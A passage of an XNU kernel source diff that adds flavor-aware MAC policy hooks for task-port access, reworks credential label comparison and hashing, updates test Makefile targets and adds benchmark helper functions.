mac_task_get_proc(struct task *task) } int -mac_task_check_expose_task(struct task *task) +mac_task_check_expose_task(struct task *task, mach_task_flavor_t flavor) { int error; + assert(flavor <= TASK_FLAVOR_NAME); + struct proc *p = mac_task_get_proc(task); if (p == NULL) { return ESRCH; @@ -87,7 +89,51 @@ mac_task_check_expose_task(struct task *task) struct ucred *cred = kauth_cred_get(); proc_rele(p); - MAC_CHECK(proc_check_expose_task, cred, &pident); + + /* Also call the old hook for compatibility, deprecating in rdar://66356944. */ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_expose_task, cred, &pident); + if (error) { + return error; + } + } + + MAC_CHECK(proc_check_expose_task_with_flavor, cred, &pident, flavor); + + return error; +} + +int +mac_task_check_task_id_token_get_task(struct task *task, mach_task_flavor_t flavor) +{ + int error; + + assert(flavor <= TASK_FLAVOR_NAME); + + struct proc *p = mac_task_get_proc(task); + if (p == NULL) { + return ESRCH; + } + struct proc_ident pident = proc_ident(p); + + proc_rele(p); + + p = current_proc(); + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_task_id_token_get_task, cred, &pident, flavor); + kauth_cred_unref(&cred); + return error; +} + +int +mac_task_check_get_movable_control_port(void) +{ + int error; + struct proc *p = current_proc(); + + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_get_movable_control_port, cred); + kauth_cred_unref(&cred); return error; } @@ -125,6 +171,18 @@ mac_task_check_set_host_exception_port(struct task *task, unsigned int exception return error; } +int +mac_task_check_dyld_process_info_notify_register(void) +{ + int error; + struct proc *p = current_proc(); + + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_dyld_process_info_notify_register, cred); + kauth_cred_unref(&cred); + return error; +} + int mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask) { diff --git
a/security/mac_mach_internal.h b/security/mac_mach_internal.h index 3e716ebd6..ba59e1b84 100644 --- a/security/mac_mach_internal.h +++ b/security/mac_mach_internal.h @@ -74,14 +74,16 @@ void mac_policy_init(void); void mac_policy_initmach(void); /* tasks */ -int mac_task_check_expose_task(struct task *t); - +int mac_task_check_expose_task(struct task *t, mach_task_flavor_t flavor); +int mac_task_check_task_id_token_get_task(struct task *t, mach_task_flavor_t flavor); int mac_task_check_set_host_special_port(struct task *task, int id, struct ipc_port *port); int mac_task_check_set_host_exception_port(struct task *task, unsigned int exception); int mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask); +int mac_task_check_get_movable_control_port(void); +int mac_task_check_dyld_process_info_notify_register(void); /* See rdar://problem/58989880 */ #ifndef bitstr_test @@ -92,7 +94,7 @@ typedef int (*mac_task_mach_filter_cbfunc_t)(struct proc *bsdinfo, int num); typedef int (*mac_task_kobj_filter_cbfunc_t)(struct proc *bsdinfo, int msgid, int index); extern mac_task_mach_filter_cbfunc_t mac_task_mach_trap_evaluate; extern mac_task_kobj_filter_cbfunc_t mac_task_kobj_msg_evaluate; -extern int mach_trap_count; +extern const int mach_trap_count; extern int mach_kobj_count; void mac_task_set_mach_filter_mask(struct task *task, uint8_t *maskptr); diff --git a/security/mac_policy.h b/security/mac_policy.h index 08adb58fb..cd87e7862 100644 --- a/security/mac_policy.h +++ b/security/mac_policy.h @@ -1059,7 +1059,8 @@ typedef void mpo_file_label_init_t( * * Determine whether the subject identified by the credential can open an * I/O Kit device at the passed path of the passed user client class and - * type. + * type. This check is performed after instantiating the user client. + * See also mpo_iokit_check_open_service_t. * * @return Return 0 if access is granted, or an appropriate value for * errno should be returned. 
@@ -1069,6 +1070,25 @@ typedef int mpo_iokit_check_open_t( io_object_t user_client, unsigned int user_client_type ); +/** + * @brief Access control check for opening an I/O Kit device + * @param cred Subject credential + * @param service Service instance + * @param user_client_type User client type + * + * Determine whether the subject identified by the credential can open an + * I/O Kit user client of the passed service and user client type. + * This check is performed before instantiating the user client. See also + * mpo_iokit_check_open_t. + * + * @return Return 0 if access is granted, or an appropriate value for + * errno should be returned. + */ +typedef int mpo_iokit_check_open_service_t( + kauth_cred_t cred, + io_object_t service, + unsigned int user_client_type + ); /** * @brief Access control check for setting I/O Kit device properties * @param cred Subject credential @@ -2152,6 +2172,27 @@ typedef int mpo_proc_check_set_host_exception_port_t( kauth_cred_t cred, unsigned int exception ); +/** + * @brief Access control check for getting movable task/thread control port for current task. + * @param cred Subject credential + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. + */ +typedef int mpo_proc_check_get_movable_control_port_t( + kauth_cred_t cred + ); +/** + * @brief Access control check for calling task_dyld_process_info_notify_register + * and task_dyld_process_info_notify_deregister. + * @param cred Subject credential + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned.
+ */ +typedef int mpo_proc_check_dyld_process_info_notify_register_t( + kauth_cred_t cred + ); /** * @brief Access control over pid_suspend, pid_resume and family * @param cred Subject credential @@ -3494,6 +3535,26 @@ typedef int mpo_proc_check_get_task_t( struct proc_ident *pident ); +/** + * @brief Access control check for getting a process's task ports of different flavors + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can get + * the passed process's task port of given flavor. + * This call is used by the task_{,read,inspect,name}_for_pid(2) API. + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. + */ +typedef int mpo_proc_check_get_task_with_flavor_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + /** * @brief Access control check for exposing a process's task port * @param cred Subject credential @@ -3513,6 +3574,47 @@ typedef int mpo_proc_check_expose_task_t( struct proc_ident *pident ); +/** + * @brief Access control check for exposing a process's task ports of different flavors + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can expose + * the passed process's task port of given flavor. + * This call is used by the accessor APIs like processor_set_tasks() and + * processor_set_threads(). + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. 
+ */ +typedef int mpo_proc_check_expose_task_with_flavor_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + +/** + * @brief Access control check for upgrading to task port with a task identity token + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can upgrade to task port + * of given flavor with a task identity token of the passed process. + * This call is used by task_identity_token_get_task_port(). + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. + */ +typedef int mpo_proc_check_task_id_token_get_task_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + /** * @brief Check whether task's IPC may inherit across process exec * @param p current process instance @@ -5342,7 +5444,7 @@ typedef void mpo_reserved_hook_t(void); * Please note that this should be kept in sync with the check assumptions * policy in bsd/kern/policy_check.c (policy_ops struct). 
*/ -#define MAC_POLICY_OPS_VERSION 69 /* inc when new reserved slots are taken */ +#define MAC_POLICY_OPS_VERSION 74 /* inc when new reserved slots are taken */ struct mac_policy_ops { mpo_audit_check_postselect_t *mpo_audit_check_postselect; mpo_audit_check_preselect_t *mpo_audit_check_preselect; @@ -5450,9 +5552,9 @@ struct mac_policy_ops { mpo_mount_label_init_t *mpo_mount_label_init; mpo_mount_label_internalize_t *mpo_mount_label_internalize; - mpo_reserved_hook_t *mpo_reserved38; - mpo_reserved_hook_t *mpo_reserved39; - mpo_reserved_hook_t *mpo_reserved40; + mpo_proc_check_expose_task_with_flavor_t *mpo_proc_check_expose_task_with_flavor; + mpo_proc_check_get_task_with_flavor_t *mpo_proc_check_get_task_with_flavor; + mpo_proc_check_task_id_token_get_task_t *mpo_proc_check_task_id_token_get_task; mpo_pipe_check_ioctl_t *mpo_pipe_check_ioctl; mpo_pipe_check_kqfilter_t *mpo_pipe_check_kqfilter; @@ -5481,7 +5583,7 @@ struct mac_policy_ops { mpo_proc_notify_exec_complete_t *mpo_proc_notify_exec_complete; mpo_proc_notify_cs_invalidated_t *mpo_proc_notify_cs_invalidated; mpo_proc_check_syscall_unix_t *mpo_proc_check_syscall_unix; - mpo_proc_check_expose_task_t *mpo_proc_check_expose_task; + mpo_proc_check_expose_task_t *mpo_proc_check_expose_task; /* Deprecating, use mpo_proc_check_expose_task_with_flavor instead */ mpo_proc_check_set_host_special_port_t *mpo_proc_check_set_host_special_port; mpo_proc_check_set_host_exception_port_t *mpo_proc_check_set_host_exception_port; mpo_exc_action_check_exception_send_t *mpo_exc_action_check_exception_send; @@ -5518,8 +5620,8 @@ struct mac_policy_ops { mpo_proc_check_debug_t *mpo_proc_check_debug; mpo_proc_check_fork_t *mpo_proc_check_fork; - mpo_proc_check_get_task_name_t *mpo_proc_check_get_task_name; - mpo_proc_check_get_task_t *mpo_proc_check_get_task; + mpo_proc_check_get_task_name_t *mpo_proc_check_get_task_name; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */ + mpo_proc_check_get_task_t 
*mpo_proc_check_get_task; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */ mpo_proc_check_getaudit_t *mpo_proc_check_getaudit; mpo_proc_check_getauid_t *mpo_proc_check_getauid; mpo_proc_check_getlcid_t *mpo_proc_check_getlcid; @@ -5550,8 +5652,8 @@ struct mac_policy_ops { mpo_socket_check_setsockopt_t *mpo_socket_check_setsockopt; mpo_socket_check_getsockopt_t *mpo_socket_check_getsockopt; - mpo_reserved_hook_t *mpo_reserved50; - mpo_reserved_hook_t *mpo_reserved51; + mpo_proc_check_get_movable_control_port_t *mpo_proc_check_get_movable_control_port; + mpo_proc_check_dyld_process_info_notify_register_t *mpo_proc_check_dyld_process_info_notify_register; mpo_reserved_hook_t *mpo_reserved52; mpo_reserved_hook_t *mpo_reserved53; mpo_reserved_hook_t *mpo_reserved54; @@ -5562,7 +5664,8 @@ struct mac_policy_ops { mpo_reserved_hook_t *mpo_reserved59; mpo_reserved_hook_t *mpo_reserved60; mpo_reserved_hook_t *mpo_reserved61; - mpo_reserved_hook_t *mpo_reserved62; + + mpo_iokit_check_open_service_t *mpo_iokit_check_open_service; mpo_system_check_acct_t *mpo_system_check_acct; mpo_system_check_audit_t *mpo_system_check_audit; diff --git a/security/mac_process.c b/security/mac_process.c index 3bcb1cba5..09aa47db2 100644 --- a/security/mac_process.c +++ b/security/mac_process.c @@ -75,6 +75,8 @@ #include #include +#include + #include #include @@ -106,10 +108,38 @@ mac_cred_label_free(struct label *label) mac_labelzone_free(label); } -int -mac_cred_label_compare(struct label *a, struct label *b) +bool +mac_cred_label_is_equal(const struct label *a, const struct label *b) +{ + if (a->l_flags != b->l_flags) { + return false; + } + for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) { + const void *pa = a->l_perpolicy[slot].l_ptr; + const void *pb = b->l_perpolicy[slot].l_ptr; + + if (pa != pb) { + return false; + } + } + return true; +} + +uint32_t +mac_cred_label_hash_update(const struct label *a, uint32_t hash) { - return bcmp(a, b, sizeof(*a)) == 0; + hash = 
os_hash_jenkins_update(&a->l_flags, + sizeof(a->l_flags), hash); +#if __has_feature(ptrauth_calls) + for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) { + const void *ptr = a->l_perpolicy[slot].l_ptr; + hash = os_hash_jenkins_update(&ptr, sizeof(ptr), hash); + } +#else + hash = os_hash_jenkins_update(&a->l_perpolicy, + sizeof(a->l_perpolicy), hash); +#endif + return hash; } int @@ -410,31 +440,48 @@ mac_proc_check_fork(proc_t curp) } int -mac_proc_check_get_task_name(struct ucred *cred, proc_ident_t pident) +mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor) { int error; - MAC_CHECK(proc_check_get_task_name, cred, pident); + assert(flavor <= TASK_FLAVOR_NAME); - return error; -} + /* Also call the old hook for compatibility, deprecating in rdar://66356944. */ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_get_task, cred, pident); + if (error) { + return error; + } + } -int -mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident) -{ - int error; + if (flavor == TASK_FLAVOR_NAME) { + MAC_CHECK(proc_check_get_task_name, cred, pident); + if (error) { + return error; + } + } - MAC_CHECK(proc_check_get_task, cred, pident); + MAC_CHECK(proc_check_get_task_with_flavor, cred, pident, flavor); return error; } int -mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident) +mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor) { int error; - MAC_CHECK(proc_check_expose_task, cred, pident); + assert(flavor <= TASK_FLAVOR_NAME); + + /* Also call the old hook for compatibility, deprecating in rdar://66356944.
*/ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_expose_task, cred, pident); + if (error) { + return error; + } + } + + MAC_CHECK(proc_check_expose_task_with_flavor, cred, pident, flavor); return error; } diff --git a/tests/Makefile b/tests/Makefile index 71a3e46a2..c9d3909bb 100644 --- a/tests/Makefile +++ b/tests/Makefile @@ -74,18 +74,33 @@ install-sr_entitlement_helper: sr_entitlement_helper sr_entitlement: OTHER_LDFLAGS += -ldarwintest_utils +restrict_jit: CODE_SIGN_ENTITLEMENTS = restrict_jit.entitlements + backtracing: OTHER_LDFLAGS += -framework CoreSymbolication backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist data_protection: OTHER_LDFLAGS += -ldarwintest_utils -framework IOKit +CUSTOM_TARGETS += immovable_send_client vm_spawn_tool + +exception_tests: excserver exc_helpers.c +exception_tests: CODE_SIGN_ENTITLEMENTS = exception_tests.entitlements +exception_tests: OTHER_CFLAGS += $(OBJROOT)/excserver.c +exception_tests: OTHER_CFLAGS += -I $(OBJROOT) +exception_tests: OTHER_CFLAGS += -DENTITLED=1 + immovable_send: excserver immovable_send: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT) immovable_send: OTHER_LDFLAGS += -ldarwintest_utils -lpthread -framework IOKit - -CUSTOM_TARGETS += immovable_send_client vm_spawn_tool inspect_port_nocodesign immovable_send: immovable_send_client +immovable_send_client: immovable_send_client.c + $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client + +install-immovable_send_client: immovable_send_client + mkdir -p $(INSTALLDIR) + cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/ + vm_spawn_tool: INVALID_ARCHS = i386 vm_spawn_tool: vm_spawn_tool.c $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) vm_spawn_tool.c -o $(SYMROOT)/vm_spawn_tool @@ -94,27 +109,30 @@ install-vm_spawn_tool: vm_spawn_tool mkdir -p $(INSTALLDIR)/tools cp 
$(SYMROOT)/vm_spawn_tool $(INSTALLDIR)/tools/ -immovable_send_client: immovable_send_client.c - $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client +CUSTOM_TARGETS += imm_pinned_control_port_crasher -install-immovable_send_client: immovable_send_client - mkdir -p $(INSTALLDIR) - cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/ +imm_pinned_control_port: excserver +imm_pinned_control_port: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist +imm_pinned_control_port: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT) +imm_pinned_control_port: OTHER_LDFLAGS += -ldarwintest_utils -lpthread +imm_pinned_control_port: imm_pinned_control_port_crasher -inspect_port_nocodesign: inspect_port.c - $(CC) $(DT_CFLAGS) -I $(OBJROOT) -DT_NOCODESIGN=1 $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $^ -o $(SYMROOT)/inspect_port_nocodesign - -install-inspect_port_nocodesign: inspect_port_nocodesign +imm_pinned_control_port_crasher: imm_pinned_control_port_crasher.c + $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) imm_pinned_control_port_crasher.c -o $(SYMROOT)/imm_pinned_control_port_crasher + $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@ + +install-imm_pinned_control_port_crasher: imm_pinned_control_port_crasher mkdir -p $(INSTALLDIR) - env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN_ALLOCATE) -r -i $(SYMROOT)/inspect_port_nocodesign -o $(SYMROOT)/inspect_port_nocodesign + cp $(SYMROOT)/imm_pinned_control_port_crasher $(INSTALLDIR)/ kas_info: OTHER_LDFLAGS += -framework CoreSymbolication kas_info: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist kdebug: INVALID_ARCHS = i386 kdebug: OTHER_LDFLAGS = -framework ktrace -ldarwintest_utils -framework kperf +kdebug: OTHER_CFLAGS += test_utils.c -EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c 
in_cksum.c +EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c test_utils.c ifneq ($(PLATFORM),iPhoneOS) EXCLUDED_SOURCES += jumbo_va_spaces_28530648.c perf_compressor.c memorystatus_freeze_test.c vm/entitlement_increased_memory_limit.c @@ -131,6 +149,8 @@ memorystatus_freeze_test: OTHER_CFLAGS += -ldarwintest_utils memorystatus_assert memorystatus_is_assertion: OTHER_LDFLAGS += -ldarwintest_utils memorystatus_is_assertion: OTHER_CFLAGS += memorystatus_assertion_helpers.c +memorystatus_vm_map_fork: OTHER_CFLAGS += test_utils.c + shared_cache_tests: OTHER_LDFLAGS += -ldarwintest_utils stackshot_tests: OTHER_CFLAGS += -Wno-objc-messaging-id @@ -179,6 +199,17 @@ kperf_backtracing: OTHER_LDFLAGS += -framework kperf -framework kperfdata -frame kperf_backtracing: OTHER_LDFLAGS += -framework CoreSymbolication kperf_backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist +text_corruption: OTHER_LDFLAGS += -ldarwintest_utils +CUSTOM_TARGETS += text_corruption_helper + +text_corruption_helper: + $(CC) $(LDFLAGS) $(CFLAGS) text_corruption_helper.c -lm -o $(SYMROOT)/$@; + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@; + +install-text_corruption_helper: + mkdir -p $(INSTALLDIR) + cp $(SYMROOT)/text_corruption_helper $(INSTALLDIR)/ + kevent_qos: OTHER_CFLAGS += -Wno-unused-macros kevent_qos: OTHER_CFLAGS += -I $(OBJROOT)/ @@ -252,11 +283,12 @@ osptr_17: osptr_compat.cpp $(CXX) $(DT_CXXFLAGS) $(OTHER_CXXFLAGS) $(CXXFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ priority_queue: OTHER_CXXFLAGS += -std=c++17 +zalloc_buddy: OTHER_CFLAGS += -Wno-format-pedantic os_refcnt: OTHER_CFLAGS += -I$(SRCROOT)/../libkern/ -Wno-gcc-compat -Wno-undef -O3 -flto -task_inspect: CODE_SIGN_ENTITLEMENTS = task_inspect.entitlements -task_inspect: OTHER_CFLAGS += -DENTITLED=1 +kernel_inspection: CODE_SIGN_ENTITLEMENTS = 
./task_for_pid_entitlement.plist +kernel_inspection: OTHER_CFLAGS += -DENTITLED=1 turnstile_multihop: OTHER_CFLAGS += -Wno-unused-macros turnstile_multihop: OTHER_CFLAGS += -I $(OBJROOT)/ @@ -286,8 +318,6 @@ $(DSTROOT)/usr/local/bin/kcdata: $(SRCROOT)/../tools/lldbmacros/kcdata.py xnu_quick_test: OTHER_CFLAGS += xnu_quick_test_helpers.c -xnu_quick_test_entitled: CODE_SIGN_ENTITLEMENTS = xnu_quick_test.entitlements - CUSTOM_TARGETS += vm_set_max_addr_helper vm_set_max_addr_helper: vm_set_max_addr_helper.c @@ -377,7 +407,7 @@ endif task_info_28439149: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist -inspect_port: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist +read_inspect: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist proc_info: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist proc_info: OTHER_LDFLAGS += -ldarwintest_utils @@ -407,6 +437,9 @@ settimeofday_29193041_entitled: OTHER_CFLAGS += drop_priv.c thread_group_set_32261625: OTHER_LDFLAGS = -framework ktrace task_info: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist +task_info: OTHER_CFLAGS += test_utils.c + +extract_right_soft_fail: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist ifneq ($(PLATFORM),iPhoneOS) EXCLUDED_SOURCES += task_vm_info_decompressions.c @@ -496,6 +529,7 @@ debug_control_port_for_pid: CODE_SIGN_ENTITLEMENTS = ./debug_control_port_for_pi prng: OTHER_LDFLAGS += -ldarwintest_utils preoslog: OTHER_LDFLAGS += -ldarwintest_utils +preoslog: OTHER_CFLAGS += test_utils.c task_policy: CODE_SIGN_ENTITLEMENTS = ./task_policy_entitlement.plist @@ -560,12 +594,14 @@ ifeq ($(PLATFORM),MacOSX) EXCLUDED_SOURCES += vm/kern_max_task_pmem.c endif -EXCLUDED_SOURCES += vm/perf_helpers.c +EXCLUDED_SOURCES += benchmark/helpers.c + +perf_vmfault: OTHER_CFLAGS += benchmark/helpers.c fault_throughput: vm/fault_throughput.c mkdir -p $(SYMROOT)/vm $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@ 
-fault_throughput: OTHER_CFLAGS += vm/perf_helpers.c +fault_throughput: OTHER_CFLAGS += benchmark/helpers.c install-fault_throughput: fault_throughput mkdir -p $(INSTALLDIR)/vm @@ -589,7 +625,7 @@ EXCLUDED_SOURCES += vm/fault_throughput.plist vm/fault_throughput.c perf_madvise: vm/perf_madvise.c mkdir -p $(SYMROOT)/vm $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@ -perf_madvise: OTHER_CFLAGS += vm/perf_helpers.c +perf_madvise: OTHER_CFLAGS += benchmark/helpers.c install-perf_madvise: perf_madvise mkdir -p $(INSTALLDIR)/vm cp $(SYMROOT)/vm/perf_madvise $(INSTALLDIR)/vm/ @@ -612,13 +648,6 @@ task_create_suid_cred_unentitled: OTHER_CFLAGS += -DUNENTITLED task_create_suid_cred_unentitled: task_create_suid_cred.c $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ -ifeq ($(PLATFORM),MacOSX) -test_dext_launch_56101852: OTHER_LDFLAGS += -framework CoreFoundation -framework IOKit -test_dext_launch_56101852: CODE_SIGN_ENTITLEMENTS += test_dext_launch_56101852.entitlements -else -EXCLUDED_SOURCES += test_dext_launch_56101852.c -endif - ioconnectasyncmethod_57641955: OTHER_LDFLAGS += -framework IOKit ifeq ($(PLATFORM),BridgeOS) @@ -630,4 +659,52 @@ endif test_sysctl_kern_procargs_25397314: OTHER_LDFLAGS += -framework Foundation -ldarwintest_utils +INCLUDED_TEST_SOURCE_DIRS += counter + +EXCLUDED_SOURCES += counter/common.c +counter/counter: OTHER_CFLAGS += counter/common.c test_utils.c +counter/counter: OTHER_LDFLAGS += -ldarwintest_utils -ldarwintest + +counter/benchmark: counter/benchmark.c + mkdir -p $(SYMROOT)/counter + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@; + +counter/benchmark: OTHER_CFLAGS += counter/common.c benchmark/helpers.c + +install-counter/benchmark: counter/benchmark + mkdir -p 
$(INSTALLDIR)/counter + cp $(SYMROOT)/counter/benchmark $(INSTALLDIR)/counter/ + +counter/benchmark_benchrun: + mkdir -p $(SYMROOT)/counter + cp $(SRCROOT)/counter/benchmark.lua $(SYMROOT)/counter/benchmark.lua + chmod +x $(SYMROOT)/counter/benchmark.lua + +install-counter/benchmark_benchrun: counter/benchmark_benchrun + mkdir -p $(INSTALLDIR)/counter + cp $(SYMROOT)/counter/benchmark.lua $(INSTALLDIR)/counter/ + chmod +x $(INSTALLDIR)/counter/benchmark.lua + +CUSTOM_TARGETS += counter/benchmark counter/benchmark_benchrun +EXCLUDED_SOURCES += counter/benchmark.c + +ifneq ($(PLATFORM),MacOSX) +EXCLUDED_SOURCES += vm/page_size_globals.c +else +vm/page_size_globals: INVALID_ARCHS = arm64 arm64e +endif + +INCLUDED_TEST_SOURCE_DIRS += lockf_uaf_poc + include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets + +trial_experiments: CODE_SIGN_ENTITLEMENTS = trial_experiments.entitlements +trial_experiments: OTHER_CFLAGS += -DENTITLED=1 test_utils.c drop_priv.c +trial_experiments: trial_experiments.c + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none --entitlements $(CODE_SIGN_ENTITLEMENTS) $(SYMROOT)/$@; + +trial_experiments_unentitled: OTHER_CFLAGS += drop_priv.c test_utils.c +trial_experiments_unentitled: trial_experiments.c + $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ diff --git a/tests/atm_diagnostic_flag_entitled.c b/tests/atm_diagnostic_flag_entitled.c index 30235c37b..329f7f7f6 100644 --- a/tests/atm_diagnostic_flag_entitled.c +++ b/tests/atm_diagnostic_flag_entitled.c @@ -3,6 +3,8 @@ #include #include +#include "drop_priv.h" + T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging")); /* @@ -11,8 +13,6 @@ T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging")); */ #define LIBTRACE_PRIVATE_DATA 0x01000000 -extern void drop_priv(void); - static bool 
_needs_reset; static uint32_t _original; diff --git a/tests/benchmark/helpers.c b/tests/benchmark/helpers.c new file mode 100644 index 000000000..37ed76625 --- /dev/null +++ b/tests/benchmark/helpers.c @@ -0,0 +1,84 @@ +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "benchmark/helpers.h" + +#define K_CTIME_BUFFER_LEN 26 +void +benchmark_log(bool verbose, const char *restrict fmt, ...) +{ + time_t now; + char time_buffer[K_CTIME_BUFFER_LEN]; + struct tm local_time; + va_list args; + if (verbose) { + strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN); + + now = time(NULL); + if (now != -1) { + struct tm* ret = localtime_r(&now, &local_time); + if (ret == &local_time) { + snprintf(time_buffer, K_CTIME_BUFFER_LEN, + "%.2d/%.2d/%.2d %.2d:%.2d:%.2d", + local_time.tm_mon + 1, local_time.tm_mday, + local_time.tm_year + 1900, + local_time.tm_hour, local_time.tm_min, + local_time.tm_sec); + } + } + + printf("%s: ", time_buffer); + va_start(args, fmt); + vprintf(fmt, args); + fflush(stdout); + } +} + +uint64_t +timespec_difference_us(const struct timespec* a, const struct timespec* b) +{ + assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec); + long seconds_elapsed = a->tv_sec - b->tv_sec; + uint64_t nsec_elapsed; + if (b->tv_nsec > a->tv_nsec) { + seconds_elapsed--; + nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec); + } else { + nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec); + } + return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond; +} + +unsigned char * +mmap_buffer(size_t memsize) +{ + int fd = -1; + unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, + fd, 0); + if ((void*) addr == MAP_FAILED) { + fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno)); + exit(2); + } + return addr; +} + +int +get_ncpu(void) +{ + int ncpu; + size_t length = sizeof(ncpu); + + 
